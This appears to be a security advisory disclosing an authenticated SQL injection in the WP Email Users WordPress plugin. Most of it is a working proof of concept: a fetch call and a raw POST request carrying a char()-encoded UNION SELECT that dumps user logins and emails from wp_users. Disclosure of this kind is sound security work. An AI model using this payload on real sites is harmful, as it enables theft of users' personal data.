WP Email Users <= 1.7.6 - Subscriber+ SQL Injection

The plugin does not escape the data_raw parameter in the weu_selected_users_1 AJAX action, available to any authenticated users, allowing them to perform SQL injection attacks.

PoC

As any authenticated user (such as subscriber), the request below will display all users email addresses fetch(“httsp://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: new URLSearchParams({“action”:“weu_selected_users_1”,“data_raw[]”:“0 UNION SELECT concat(char(97),char(58),char(49),char(58),char(123),char(105),char(58),char(48),char(59),char(115),char(58),char(54),char(57),char(58),char(34),char(49),char(32),char(85),char(78),char(73),char(79),char(78),char(32),char(83),char(69),char(76),char(69),char(67),char(84),char(32),char(99),char(111),char(110),char(99),char(97),char(116),char(40),char(117),char(115),char(101),char(114),char(95),char(108),char(111),char(103),char(105),char(110),char(44),char(32),char(99),char(104),char(97),char(114),char(40),char(52),char(52),char(41),char(44),char(32),char(117),char(115),char(101),char(114),char(95),char(101),char(109),char(97),char(105),char(108),char(41),char(32),char(70),char(82),char(79),char(77),char(32),char(119),char(112),char(95),char(117),char(115),char(101),char(114),char(115),char(34),char(59),char(125))”}), “method”: “POST”, “credentials”: “include” }) .then(response => response.text()) .then(data => console.log(data)); POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate content-type: application/x-www-form-urlencoded Content-Length: 1405 Connection: close Cookie: [any authenticated user] action=weu_selected_users_1&data;_raw%5B%5D=0+UNION+SELECT+concat%28char%2897%29%2Cchar%2858%29%2Cchar%2849%29%2Cchar%2858%29%2Cchar%28123%29%2Cchar%28105%29%2Cchar%2858%29%2Cchar%2848%29%2Cchar%2859%29%2Cchar%28115%29%2Cchar%2858%29%2Cchar%2854%29%2Cchar%2857%29%2Cchar%2858%29%2Cchar%2834%29%2Cchar%2849%29%2Cchar%2832%29%2Cchar%2885%29%2Cchar%2878%29%2Cchar%2873%29%2Cchar%2879%29%2Cchar%2878%29%2Cchar%2832%29%2Cchar%2883%29%2Cchar%2869%29%2Cchar%2876%29%2Cchar%2869%29%2Cchar%2867%29%2Cchar%2884%29%2Cchar%2832%29%2Cchar%2899%29%2Cchar%28111%29%2Cchar%28110%29%2Cchar%2899%29%2Cchar%2897%29%2Cchar%28116%29%2Cchar%2840%29%2Cchar%28117%29%2Cchar%28115%29%2Cchar%28101%29%2Cchar%28114%29%2Cchar%2895%29%2Cchar%28108%29%2Cchar%28111%29%2Cchar%28103%29%2Cchar%28105%29%2Cchar%28110%29%2Cchar%2844%29%2Cchar%2832%29%2Cchar%2899%29%2Cchar%28104%29%2Cchar%2897%29%2Cchar%28114%29%2Cchar%2840%29%2Cchar%2852%29%2Cchar%2852%29%2Cchar%2841%29%2Cchar%2844%29%2Cchar%2832%29%2Cchar%28117%29%2Cchar%28115%29%2Cchar%28101%29%2Cchar%28114%29%2Cchar%2895%29%2Cchar%28101%29%2Cchar%28109%29%2Cchar%2897%29%2Cchar%28105%29%2Cchar%28108%29%2Cchar%2841%29%2Cchar%2832%29%2Cchar%2870%29%2Cchar%2882%29%2Cchar%2879%29%2Cchar%2877%29%2Cchar%2832%29%2Cchar%28119%29%2Cchar%28112%29%2Cchar%2895%29%2Cchar%28117%29%2Cchar%28115%29%2Cchar%28101%29%2Cchar%28114%29%2Cchar%28115%29%2Cchar%2834%29%2Cchar%2859%29%2Cchar%28125%29%29